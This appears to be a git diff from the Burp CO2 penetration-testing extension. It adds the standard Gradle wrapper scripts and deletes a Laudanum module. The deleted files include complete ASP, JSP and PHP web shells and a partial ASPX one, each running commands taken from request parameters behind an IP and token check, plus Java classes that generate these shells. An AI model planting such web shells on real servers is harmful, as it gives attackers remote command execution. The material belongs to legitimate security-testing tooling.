z8Ui^;Ds^gq6ti(1xB7y_$zA!i-M~#!!tl$ErTR>P~>T=Yky)8(uvPbvLmB=UfoD zrfl}8<1OQrm?8#j1!?s*T>AoectQl&m!o&*^JcIW`_&bk3tN}k^0rjl=HL$z*uIYt z?7l?^Dqr?q1210Sp$xoAy!&{2^{^Anl460 zI&7urrc&|Y{rjv04VOl{y7c82N6xzg5ueYmQ(q(zC3w_C#x*~%yf5j7MI{W`tsoxzA*PrmK)cTskU| zf2C}Bq$>S$-1JgIh0aW@LxI|-8(OGuD#^M01ghh}&#ObO>tZgSw_LW`zdf&IN$YO# z)|X_9m#JwLW5pErZB3ScggKcNzxA9(hyKkK9I#pR&79&*+SV_eu={00{HF=Bb+AEe znaSof+r1jZ!EL5XgqXWkckaFSSyEk}o!%p8XsD}O>borZ6x%X2b&q!s&1-O(>`kZ$ zB2l^5Cx9xQx9)PXN1xPM)@+LxACH_iZ8zGc(>wnFS_O|@hKsxpMjXOzLEa7OvSlM&&G9ioQw9~RsD4F zK7Q+_&|Q6{eZ^8Rx@pKL`le6kH+(fLc{=V&{b%I5=n}VHV4)X_2Y!pYxgC8wU)yP! zPF3t$?(jsC>Ge=&{kmPGUEETpaw(QTAl)m#{qR3_aq9!wK%6XHfV4C>Y^>Z|%ns7j z{Ja?^IA{+@;kR#IjHxkar%3$eJT4?xNBKUVmoO z`A8Zo-{~_;vcikZ(p}EZzU4kO6WPqkMyE{VvS?;44Z@lj zz^fKX9UL!8Wc(9VgI?P4*zpis8dzl};I>yr1>dtXU=FTAlx}Eht4-*7RACL^AflGh zyZb1hTf(~CkMo%#Q%NMgM9tE2D+)joqbtHYA89Ql1nqVTt+MxZ^*FRd&n5YlIi!8m z>$Ysd!l{+C)y;Wa(ZV-=<+NZKV;v4mt}v2m>`v$-$3b;GsLxf= zd~f(rmfpl``{0aVwN7y!>eGyJFP`L+TxHjHTOS{K^$L2`@6(Rli`{EFwpH@R%eZ6g zwf7rc43Yk!=k;{ z-Rn%~B3amGr}}SxfE$vS8FIPL=Qt57$|R#sSoFgdNUT?fYOYjPl%ZBFpi=jq=DWby7Zxm@y;B<89!9= zbgEH*Uy)~iq5kJLX$+ps$kV`#6jW#|9BGz^`ivNeid(wVbk4jl)VBpW&~;eXNi{#` zwx?{DXR~*sqQcFhY0XCfQ4-*2aN1BGX>$_swtKEqnd>j6vcZ!#0)pXRi?<{!P?tGw z2x_`RD$W)qD{?z}VDPt?+)8*rqLWFIPQ(9-VbBdf{7ff?w9CZ{sIi_gnuC$I0(+P8 zms9XB%}VQ>>pve##}jog6+cD?v~n4Pa9Vmc zg#K$|+`adO=B7`uj35Y}6EZ z{dY`x@w8;R-7zrsr1O_~Jvl*|o-x%jF=Rr1C}GXP^|IYN`1sqmG-oI@R#%X66c#5W z$$tQB)sqwiVm;Y^`Dw3mo|firP{*HsOQJre5%Dm^H@we0FN88VWJ0dja?_U38z73f zrCV!b3qNP0kM#%9T!W5`ynGcg%BL28FW1J-J1_S`BJGCaReQ!am(2%qZ3lLgzq|ns z!!fF@`0=*z)J2BwZ*hO|Yu^cI_nF$9l-Pb3jE7=P8gZ#!xiuZ7-cSa`gb`6mxGTgg z-DLdID?M!Z%+hHB#{?&0$GFRpf+_}q<_wbzX6K?w;%6szz1RbySDSr2r^h_qi$khs zXdZ9A0!_Bf)TR2-^-K~q`FQ!#1x(U4VbV%AA@Ei{%cA(EwC{XfjRi?`&9rav5;Q5% zO1`Rn@OA_ZB@N*mC#)?d3P!}Eh;=NgpIKsy{(yr`hv=aouwt@r&P&}Z3DNWo9ro30 zX52~(aTV$*HHlgB66-4GQru!_AZ|)V*I5X=WG)`N@U&D>e@@C#V@JwEL*L`7#$yes z62C^5%Qniaow2$3HrAc7U{qzpb&FA*xLI1JSWR@`RF=JCcvTI)%dH7;sWInt9JLu# z|Ao|Q?K)cDg_JKsym=joo5gR80wtv01N`um1nQ@Ms0Y*bVzxL34} zo?gizp?`=Y{*W>^Hy2%Jl)y?A+&7s1UVHFixuIy~sawXjcDCL`129cK7|ZQS0u;A} zTJC#WNmqkIrnHpAhHVcM(U^vJA~dl@jf_bs*3?i+=&vuC?Aiy_pcB~=1syDni4 zw+FLuz>F773u#$;NUQ9WDtUPY@+rA3WBhQdKFKOyzkA(URa7;4tW>3jQIfi8v0h3g zJC_HVDXS#>DWb|&se7FHnr=q&l#xg9o02}}u=b-R>@sw={Z zHF*?t2FmhqZ=|qa>x=A!*$S+0T zhO*D*M?NTf-eX`eO)9TIQu{7Dm77Acnj4b1jI9@c*ZL8wL%8kLEhd$KM8=Y!fbN@9 zC7B5#y>JM1n5M)!&im==EgHs2j+xCZG~+~QWCi?s!QyFo2kqx{%jE2n3^N*Ayz6Lp zhg5g^3# z+5FoJ@$u@9WJgPKpUWEd4}4AK9TJKU8W%ms!d0p%OIOX+bY+55zl!vIaz$XFI9Ep+ z;bL_}7PDI2Y`Ng*XY(65 zh0%`@Lve%fc;)N4_g12bNrt6gH=N#OHtxO`$lpWlw=Z6MF+E@;>GkZ#lAZTn`aHwf z&I1|aV#b_VHMIgBN*RzU9i@Z@m}0i>o?({&%fpEfaOpFeaJ7V37;m0?kzd}}Lk@9$ zL}8TEo7WZAcRi%zFZxkr6<0k#X-;lTD`Oc~cDb@olwgWCewvk{GJ}hCXbF!AdiLpd z|Cck$ZTKI?Ack{34Lva7+k=H8K2HTZiurox6F+>dy+@R9T^awxj590D$|kXUg+Ygc z(f)jlRwN(4z$#%PnOVc;#Fv{nAi{#UcXPNcmP#5O{zh_*`=q^JCeia{sN4zHjk2*y zqUVh{Ya{j>SPmP^i#Qfcq_MTqo8g52Fi^F zKBc$$HVI!xFx*4Y9l+nt)$AoZORD}%5I10oI3kx`-N30QueiwIw#0VV2E*Fb-nKW% z=+r^hos`Y-7~{cA1FVbK$_=~*z53+Q8KGjg;>ztg((H12%QTf4OYU8y)C}h5yo#$% z&Q$`vMM*g?ZcatAn2j!hFv8KuN(dw)T*}sF#THDHxo8xC^?vJ zc`U6bVo~hOr6I!8*GTZ<^D~;unKjK=!IR|GB4E>Mcvt*2GK);93jIDd<(nNjHO z4Hi@2^%Uyx=^Z~5eZ!5rO5%4H|eFoNjD#+Kcu%_57zZb4Z@Ak#X6txD^{U3wBl^r+W- zLorkK;uc;NgTj7dGxHQS+@T*T>Q*j4^Ll$ejQqWrwcHyG9y%Mk%m8nBVG5hvSaYm5 zJN^#-Q46kZG)@T8n2^QCjxIwxUVi%s>EY`E?#@_(A~njFrTiDq;8v|W-1jT|ROlNI zU$h|YoD4PVTE^&NC6_m{EAFBVqsM`P*`-AcDGWQygURzM32Xeq2xng~XQsYeTZ5v$ zQLaa2M_Iplw}4eL6fLPu`6`PYcVMysO>`{8CB~glD=TX7?JZcHfHNmykBM?QD)#D) zGp>R*<^D?WhFQKRc^}22l6F=D2RPrxaX2ZF!b1X0XF*d4%=!sbNcS1q2WOUE(7e4$ z^L8f;F)__d3>&KQFE8%$I4h^y5FYBfB&fWzn71_OSrPe-DHV{O#Q;GP z+Tw!J?eVjX19RKH?*hKQWQt8r7B#lYX8xoSHFGCW-*DSQ4EM4M3Mw%gkSYNK18@(e zfzMF}WWaCyS@1y%-~Xg0ry~tkQkUmKuI5lGAua{{vn22V!2T()AU5FpKh@Nv)s^Js zv~@VuUG;=CnLmQR{PeUBQf2;lAV!vG>^Z0N zL88rrjL-*J!43;7C=w9xhcw`yjRKq7o4L9=0SmR9PA-nX12@#h(iIu-0N_xm2OV)( zU_raT0y>$wm^oMi2|U3N;OhF9uy}`<-xVka#DV*l{O0yHzi9vUxa1Qtpi$buR*8cU zd4~lS1pT$L^!0=6qUKOpM+XPsy{f7W#1bjrEwaeN!Ik9(zySIT^pEHvHgJUneFN4) zk=k|$55(g8slmS|@+*4fr2urd3LwjIIZA**g+%l(SZNn4HwQ}y6o`vw>2&mR1X+&q zDa1Af0B;4rAMZMOlHbAqK|R_xuwJ7ANARtFE({-P2o{tJJR<>2KVp)ZK-M;)ejx zd*E~Mka<{OL7%CAhk4n|1qg?97-I!l0rOinjVi#arbgg4bi5;nY5oFL`UWtPk5&L#grSxv zE3!}=1px!ZTLT90aYc^s`~{VojjJml&<`@e41dFP+XU6D0AOkbn2rlI3>^LcqauG& zc$m3Z{!u8LvUrm^fT{qX5yD9{?r(CCiUdck%!T`KIZd2oQJz1joB&M(Teg_>;yS<2-5>BWfSPpG`Rt{!j6>kqMAvl^zk0JUEfy$HVJMkxP-GkwZuxL62me2#pj_5*ZIU zP~#C^OZLfl$HO)v;~~c&JHivn|1I9H5y_CDkt0JLLGKm(4*KLVhJ2jh2#vJuM6`b& zE==-lvME^Oj022xF&IV*? '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command; +# * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of +# shell script including quotes and variable substitutions, so put them in +# double quotes to make sure that they get re-expanded; and +# * put everything else in single quotes, so that it's not re-expanded. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/gradlew.bat b/gradlew.bat new file mode 100644 index 0000000..93e3f59 --- /dev/null +++ b/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/modules/co2-laudanum/co2-laudanum.iml b/modules/co2-laudanum/co2-laudanum.iml deleted file mode 100644 index 0b77a8c..0000000 --- a/modules/co2-laudanum/co2-laudanum.iml +++ /dev/null @@ -1,15 +0,0 @@ - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/asp/shell.asp b/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/asp/shell.asp deleted file mode 100644 index 9871ebb..0000000 --- a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/asp/shell.asp +++ /dev/null @@ -1,120 +0,0 @@ -<% -' ******************************************************************************* -' *** -' *** Burp-Laudanum -' *** -' *** This is a Burp CO2 adoptation of similar functionality defined in the -' *** Laudanum project. -' *** -' *** CO2: www.burpco2.com -' *** -' *** Burp-Laudanum Author: -' *** Jason Gillam -' *** -' *** Laudanum Project -' *** A Collection of Injectable Files used during a Penetration Test -' *** -' *** More information is available at: -' *** http://laudanum.secureideas.net -' *** laudanum@secureideas.net -' *** -' *** Project Leads: -' *** Kevin Johnson -' *** -' *** Copyright 2013 by Kevin Johnson and the Laudanum Team -' *** -' ******************************************************************************** -' *** -' *** Updated and fixed by Robin Wood -' *** Updated and fixed by Tim Medin "${LAUD.TOKEN}") Then - response.Status="403 Access Denied" - response.Write(response.Status) - response.End -End If - -On Error Resume Next -Err.Clear - -cmd = Request.QueryString("laudcmd") -If (cmd = "") Then - cmd = Request.Form("laudcmd") -End If - -cwd = Request.QueryString("laudcwd") -If (cwd = "") Then - cwd = Request.Form("laudcwd") -End If - -If (cwd = "." Or cwd = "") Then - set fso = CreateObject("Scripting.FileSystemObject") - cwd = fso.GetFolder(".") - set fso = nothing -End If - -Dim wshell, intReturn, strPResult, strEResult -set wshell = Server.CreateObject("WScript.Shell") -wshell.CurrentDirectory = cwd - -If (Left(cmd, 2) = "cd") Then - newname = Right(cmd, len(cmd) - 3) - set fso = CreateObject("Scripting.FileSystemObject") - newdir = fso.BuildPath(cwd, newname) - If (fso.FolderExists(newdir)) Then - wshell.CurrentDirectory = newdir - strPResult = "(Laudanum: cd succeeded)" - Else - strEResult = "Error: Folder does not exist." - End If -Else - Set objCmd = wShell.Exec(cmd) - strPResult = objCmd.StdOut.Readall() - strEResult = objCmd.StdErr.Readall() -End If - -If Err.Number = 0 Then - response.write "stdout=" & Server.URLEncode(strPResult) & "&stderr=" & Server.URLEncode(strEResult) & "&cwd=" & Server.URLEncode(wshell.CurrentDirectory) -Else - response.write "stderr=" & Err.Source & " - " & Err.Description & "&cwd=" & cwd -End If - -set wshell = nothing - -%> diff --git a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/aspx/shell.aspx b/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/aspx/shell.aspx deleted file mode 100644 index 1b17970..0000000 --- a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/aspx/shell.aspx +++ /dev/null @@ -1,161 +0,0 @@ -<%@ Page Language="C#"%> -<%@ Import Namespace="System" %> -<%@ Import Namespace="System.IO" %> - - -&stdout=<%=Server.UrlEncode(stdout)%>&stderr=<%=Server.UrlEncode(stderr)%>&cwd=<%=Server.UrlEncode(cwd)%>& \ No newline at end of file diff --git a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/java/shell.jsp b/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/java/shell.jsp deleted file mode 100644 index 862144d..0000000 --- a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/java/shell.jsp +++ /dev/null @@ -1,93 +0,0 @@ -<%@ page import="java.io.*" %> -<%@ page import="java.net.URLDecoder"%> -<%@ page import="java.net.URLEncoder"%> -<% -/************************************************************************** -*** Burp-Laudanum -*** -*** This is a Burp CO2 adoptation of similar functionality defined in the -*** Laudanum project. -*** -*** CO2: www.burpco2.com -*** -*** Burp-Laudanum Author: -*** Jason Gillam -*** -*** Copyright © 2014, Kevin Johnson and the Laudanum team.
-*** Written by Tim Medin.
-*** Get the latest version at laudanum.secureideas.net. -***************************************************************************/ - -String[] allowsIPs = {${LAUD.IPS}}; -String allowedToken = "${LAUD.TOKEN}"; -String token = request.getParameter("laudtoken"); -String cmd = request.getParameter("laudcmd"); -String cwd = request.getParameter("laudcwd"); -String lip = request.getRemoteAddr().toString(); -boolean debug = false; - -if(token!=null && cmd != null && token.equals(allowedToken) && java.util.Arrays.asList(allowsIPs).contains(lip)) { - File workingDir; - - if(cwd!=null){ - cwd = new String(URLDecoder.decode(cwd)); - } - - if(cwd == null || cwd.equals(".")){ - workingDir = new File("t").getAbsoluteFile().getParentFile(); - } else { - workingDir = new File(new String(URLDecoder.decode(cwd))); - } - cmd = new String(URLDecoder.decode(cmd)); - if(cmd.startsWith("cd ")){ - String newdir = cmd.substring(3); - if(newdir.equals("~")){ - workingDir = new File("t").getAbsoluteFile().getParentFile(); - } else if (newdir.startsWith("/")){ - workingDir = new File(newdir); - } else { - workingDir = new File(workingDir, newdir); - } - - if(workingDir.exists() && workingDir.isDirectory()){ - out.print("stdout=(Laudanum cd successful)&cwd="+URLEncoder.encode(workingDir.getAbsolutePath())); - } else { - out.print("stderr="+URLEncoder.encode("Directory not found.")+"&cwd="+cwd); - } - - }else{ - String[] params = new String[0]; - Process p = Runtime.getRuntime().exec(cmd, params, workingDir); - - OutputStream os = p.getOutputStream(); - InputStream in = p.getInputStream(); - DataInputStream dis = new DataInputStream(in); - String disr = dis.readLine(); - StringBuilder outBuf = new StringBuilder(); - while ( disr != null ) { - outBuf.append(disr+"\n"); - disr = dis.readLine(); - } - StringBuilder laudOutput = new StringBuilder(); - laudOutput.append("stdout="); - laudOutput.append(URLEncoder.encode(outBuf.toString())); - laudOutput.append("&cwd="); - laudOutput.append(URLEncoder.encode(workingDir.getAbsolutePath())); - - out.print(laudOutput.toString()); - //todo: is p.destroy() required here? - //todo: capture stderr - } - -} else { - out.println("404 - Not Found"); // todo: return header - if(debug){ - out.println("
Token: " + token); - out.println("
Token Matched?: " + allowedToken.equals(token)); - out.println("
IP: " + lip); - out.println("
IP Matched?: " + java.util.Arrays.asList(allowsIPs).contains(lip)); - out.println("
cmd: " + cmd); - } - -} -%> \ No newline at end of file diff --git a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/php/shell.php b/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/php/shell.php deleted file mode 100644 index 94df30b..0000000 --- a/modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/php/shell.php +++ /dev/null @@ -1,159 +0,0 @@ - -*** -*** Laudanum Project -*** A Collection of Injectable Files used during a Penetration Test -*** -*** More information is available at: -*** http://laudanum.secureideas.net -*** laudanum@secureideas.net -*** -*** Project Leads: -*** Kevin Johnson -*** Tim Medin -*** -*** Copyright 2013 by Kevin Johnson and the Laudanum Team -*** -******************************************************************************** -*** -*** This file provides shell access to the system. It is built based on the 2.1 -*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler -*** -*** -*** Updated by Tim Medin -*** -******************************************************************************** -*** This program is free software; you can redistribute it and/or -*** modify it under the terms of the GNU General Public License -*** as published by the Free Software Foundation; either version 2 -*** of the License, or (at your option) any later version. -*** -*** This program is distributed in the hope that it will be useful, -*** but WITHOUT ANY WARRANTY; without even the implied warranty of -*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -*** GNU General Public License for more details. -*** -*** You can get a copy of the GNU General Public License from this -*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 -*** You can also write to the Free Software Foundation, Inc., 59 Temple -*** Place - Suite 330, Boston, MA 02111-1307, USA. -*** -***************************************************************************** */ - - -$allowedIPs = array(${LAUD.IPS}); -$allowedToken = "${LAUD.TOKEN}"; - -$allowed = 0; -$token = isset($_GET['laudtoken']) ? $_GET['laudtoken'] : (isset($_POST['laudtoken']) ? $_POST['laudtoken'] : ''); - - -$LIP = $_SERVER["REMOTE_ADDR"]; -if ($token == $allowedToken){ - foreach ($allowedIPs as $IP) { - if ( $LIP == $IP ) - $allowed = 1; - } -} - -if ($allowed == 0) { - header("HTTP/1.0 404 Not Found"); - die(); - //die("IP " . $LIP . ", token detected: " . $token); -} - - -/* This error handler will turn all notices, warnings, and errors into fatal - * errors, unless they have been suppressed with the @-operator. */ -/*function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { - header("HTTP/1.0 500 Server Error"); - - die($errstr); -} - -set_error_handler('error_handler'); -*/ - -set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) { - // error was suppressed with the @-operator - if (0 === error_reporting()) { - return false; - } - - throw new ErrorException($errstr, 0, $errno, $errfile, $errline); -}); - - - - -$command = isset($_GET['laudcmd']) ? $_GET['laudcmd'] : (isset($_POST['laudcmd']) ? $_POST['laudcmd'] : ''); - -$cwd = isset($_GET['laudcwd']) ? $_GET['laudcwd'] : (isset($_POST['laudcwd']) ? $_POST['laudcwd'] : '.'); - -if($cwd <> '.'){ - chdir(urldecode($cwd)); -} - -$stdout = ''; -$stderr = ''; - /* Alias expansion. */ - //$length = strcspn($command, " \t"); - //$token = substr($command, 0, $length); - //if (isset($ini['aliases'][$token])) - // $command = $ini['aliases'][$token] . substr($command, $length); - - if ($command <> ''){ - $command = urldecode($command); - if (substr($command, 0, 3) === 'cd ') { - $params = substr($command, 3); - if($command == 'cd ~') { - $home = getenv("HOME"); - if($home == FALSE){ - $params = $_SERVER['DOCUMENT_ROOT']; - }else { - $params = $home; - } - } - - try{ - if (chdir($params)) { - // getcwd(); - }else{ - $stderr = 'Cannot read dir '.$params; - } - }catch(Exception $e) { - $stderr = 'Exception on chdir '.$e->$errstr; - } - }else{ - $io = array(); - $p = proc_open($command, - array(1 => array('pipe', 'w'), - 2 => array('pipe', 'w')), - $io); - - /* Read output sent to stdout. */ - while (!feof($io[1])) { - $stdout .= fgets($io[1]); - } - /* Read output sent to stderr. */ - while (!feof($io[2])) { - $stderr .= fgets($io[2]); - } - fclose($io[1]); - fclose($io[2]); - proc_close($p); - } -} -?> - - \ No newline at end of file diff --git a/modules/co2-laudanum/src/burp/BurpExtender.java b/modules/co2-laudanum/src/burp/BurpExtender.java deleted file mode 100644 index 7460c71..0000000 --- a/modules/co2-laudanum/src/burp/BurpExtender.java +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Copyright (c) 2014 Jason Gillam - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package burp; - -import com.professionallyevil.co2.Co2Extender; -import com.professionallyevil.co2.laudanum.LaudanumCo2Extender; - -public class BurpExtender implements IBurpExtender { - private final Co2Extender co2Extender = new LaudanumCo2Extender(); - - @Override - public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { - co2Extender.registerExtenderCallbacks(callbacks); - } -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPShellPayloadType.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPShellPayloadType.java deleted file mode 100644 index 6427a91..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPShellPayloadType.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Copyright (c) 2014 Jason Gillam - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package com.professionallyevil.co2.laudanum; - -import java.awt.*; -import java.io.File; -import java.io.FileOutputStream; - -public class ASPShellPayloadType extends PayloadType { - - @Override - public void savePayload(Component parentComponent, String acceptIPs, String acceptToken) throws Exception { - File file = chooseFile(parentComponent, "shell.asp", "Choose asp filename"); - if (file != null) { - FileOutputStream fos = new FileOutputStream(file); - processTemplate(fos, renderList(acceptIPs.split(","), ",", ""), acceptToken); - } - } - - @Override - String getTemplate() { - return "com/professionallyevil/co2/laudanum/asp/shell.asp"; - } -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPXShellPayloadType.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPXShellPayloadType.java deleted file mode 100644 index 3dc6a30..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPXShellPayloadType.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Copyright (c) 2014 Jason Gillam - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package com.professionallyevil.co2.laudanum; - -import java.awt.*; -import java.io.File; -import java.io.FileOutputStream; - -public class ASPXShellPayloadType extends PayloadType { - - @Override - public void savePayload(Component parentComponent, String acceptIPs, String acceptToken) throws Exception { - File file = chooseFile(parentComponent, 